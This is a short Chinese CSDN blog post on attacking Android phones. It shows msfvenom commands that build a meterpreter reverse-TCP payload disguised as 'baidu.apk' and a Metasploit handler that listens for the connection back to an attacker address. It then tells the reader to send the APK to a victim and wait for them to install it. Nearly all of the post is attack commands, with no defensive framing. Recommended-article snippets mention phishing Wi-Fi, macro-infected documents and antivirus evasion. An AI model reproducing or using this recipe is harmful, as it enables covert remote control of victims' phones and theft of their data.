安卓apk 客户端渗透

最新推荐文章于 2024-09-14 19:06:02 发布
最新推荐文章于 2024-09-14 19:06:02 发布
阅读量756 收藏 1
点赞数 3
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68281676/article/details/126715147
版权
本文介绍了如何使用msfvenom生成针对安卓设备的恶意APK文件,通过设置LHOST和LPORT来指定回连地址和端口。在本地启动msfconsole并设置相应参数后,当目标设备安装并运行该APK,攻击者即可进行监听。
摘要由CSDN通过智能技术生成

┌──(root㉿root)-[~/桌面]
└─# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.40.128 LPORT=4444 R > baidu.apk

 

启动监听

┌──(root㉿root)-[~/桌面]
└─# msfconsole   

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set LHOST 192.168.40.128

msf6 exploit(multi/handler) > set LPORT 4444

 

msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp

 

msf6 exploit(multi/handler) > run

 

这个时候把这个apk文件发送给对方

对方手机下载安装   这边就可以监听到了

 

奈·Suriel
关注
安卓apk 客户端渗透<高级>
weixin_68281676的博客
09-12 3284
Failed to verify signed artifacts报错解决
MSF实战-利用0day双杀java环境-宏感染-安卓客户端进行渗透
L120305q的博客
03-31 717
MSF实战笔记
使用kali对安卓手机进行渗透测试
热门推荐
lxy123_com的博客
02-12 2万+
实验环境:Kali虚拟机一台,4G运行,IP地址192.168.0.105;安卓手机一部,建议使用不用的破手机 实验目的:对安卓机进行攻击测试 实验步骤: (一),配置卡里环境 1,kali配置网络 ┌──(root????kali)-[~] └─#ifconfig 查看kali本机IP地址 eth0: flags=4
渗透测试-安卓APP经验总结
aming小老弟
04-20 2467
安卓渗透经验
Android安卓)APP渗透测试-总结
H5oSir
01-05 1万+
文章目录基础知识安卓系统目录结构组件基础APK目录结构ADB使用Drozer客户端安全测试反编译测试(脱壳与混淆)脱壳回编译测试本地敏感信息存储四大组件安全本地注入动/静态扫描安全的通信方式HOOK开源移动端扫描工具APP安全在线检测系统服务端渗透测试SSL证书抓包问题安装证书问题证书校验问题 前言:这是一份资料整理,不是一份教程,教程在“心中”。 很多时候对产品进行测试,但是总会遇到一些重复的问题,后来发现大部分时间都花在问题检索和筛选上了(检索五分钟,测试一分钟),因此有了这份总结。学会把时间花费在有意
安卓客户端渗透
Time_worm的博客
08-09 908
安卓客户端渗透目前来说已经是CTF中一个非常重要的分类了,但是通常的它更多的是二进制层面的博弈,如果仅仅是在apk中注入后门可能非常简单,但通常需要的是一系列的攻击手段来辅助完成的。关于渗透思路,可以将payload注入到正常的apk中,构建一个钓鱼wifi,比如说设置一个没有密码的钓鱼wifi,需要下载软件才能正常上网,用户下载运行软件后即被远程控制。
kali系统渗透android
鸣风
12-25 856
kali系统渗透安卓
客户端渗透
8888的博客
07-03 818
介绍:我们要进行客户端渗透,我们生成一个可执行程序,也是简单粗暴,MSF建立监听,把它发给受害者,只要受害者点击,监听机监听的机器直接上线(现在这种方法一般不会成功,杀毒软件会直接杀掉,这个程序可以经过几种语言编码,降低杀毒软件的防范可能直接免杀,虽然不能实际直接使用,但可以让我们了解和预防这类的攻击,本质上是一样的) 生成一个带有反弹连接的EXE程序:开启Apache服务使能够下载:访问这个虚拟机IP及其对应的文件,下载放在靶机上面去,并且关闭杀毒软件,要不然会直接把程序清除MSF开启监听:我们点击我们下
利用 0day 双杀-java 环境-宏感染-安卓客户端渗透
weixin_46035615的博客
04-26 3469
利用 0day 双杀-java 环境-宏感染-安卓客户端渗透 1 实战-利用 0DAY 漏洞获取 shell 2 实战-基于 java 环境的漏洞利用获取 shell 3 实战-利用宏感染 word 文档获取 shell 4 安卓客户端渗透
Android APP渗透测试方法大全.pdf
07-30
Android APP 渗透测试方法】是针对安卓应用程序进行安全评估的一种重要手段,旨在发现潜在的安全漏洞和风险,确保用户数据和系统安全。本篇文档详细介绍了渗透测试的方法和工具,适合不同层次的读者学习。 1. **...
APP安卓渗透测试四大步骤
网站安全资讯
07-15 1482
在开始APP安卓渗透测试时,根据需要制定步骤,并向委托方详细说明需要使用的工具、方法等。具体操作时,会把渗透测试分成三个部分和阶段,不同的角度使区别的方法...
Android】【Bug】使用OSmdroid绘制轨迹断裂问题
每天不是在写bug就是在写bug的路上
09-14 891
使用OSmdroid绘制轨迹断裂问题
【兼容性记录】video标签在 IOS 和 安卓中的问题
fans_x的博客
09-13 923
业务需求背景:由于业务中涉及到有视频播放的内容,所以就使用了video标签去做,但是video标签在ios 设备和安卓设备中的默认行为不一致,故记录下解决方法(折中办法)。
Android 内置应用裁剪
Framework-coder的博客
09-13 202
参考 AOSP 中 PRODUCT_PACKAGES 配置的方式,自定义一个“PRODUCT_PACKAGES_REMOVE”配 置选项。用户可根据自身项目的需要,将需裁剪的 APK 名称(无需 .apk 后缀) 都添加到“PRODUCT_PACKAGES_REMOVE”项下,从而做到一次性全部裁剪。此方法省去了查找目标 APK 的编译.mk 文件的时间,提高了工作效率。补丁如下:从以上补丁可以发现,只要是添加在“PRODUCT_PACKAGES_REMOVE”配置项下的 APK 都将被裁剪。
android 14.0 USB连接模式默认设为MTP
安卓兼职framework和app工程师的博客
09-13 400
在14.0android系统产品开发中,在通过otg连接设备的时候,会弹出usb连接模式这时候会让客户选择当前连接电脑是 哪种模式,在项目开发中,需要以mtp模式,就是可以在电脑查看设备的内部存储的样式来设置otg连接电脑的模式, 接下来分析下相关模式,来具体实现相关功能
Android14 蓝牙 BluetoothService 启动和相关代码介绍
最新发布
wenzhi的博客
09-14 1791
蓝牙开关和使能开发主要用到:BluetoothService、BluetoothManagerService、BluetoothManager、BluetoothAdapter 这几个系统相关类。某个蓝牙的配对、连接、断开 使用的是 BluetoothDevice 对象。蓝牙开关状态不记忆或者打开异常就可以看看BluetoothManagerService的日志,里面有打开关闭相关过程日志和时间点,这个对问题分析有一定的帮助。本文主要介绍一下 framework 相关的几个类,
Thinkphp5 + Swoole实现邮箱异步通知
Crazy_shark的博客
09-11 787
通过 Swoole 实现的异步任务处理机制,可以将耗时操作如发送邮件等操作放入后台异步执行,提升用户体验和系统性能。Swoole 的 Task 机制非常适合处理这种场景,结合 ThinkPHP 使得开发异步任务更加简单高效。
使用Frida进行Android APK加解密渗透测试
"这篇文档是关于使用 Frida 进行 Android APK 加解密渗透测试的教程,由作者 BMa 在小密圈分享。Frida 是一个跨平台的动态代码插桩工具,它允许通过 Python 和 JavaScript 接口对目标进程进行函数拦截、代码注入等...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

奈·Suriel

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值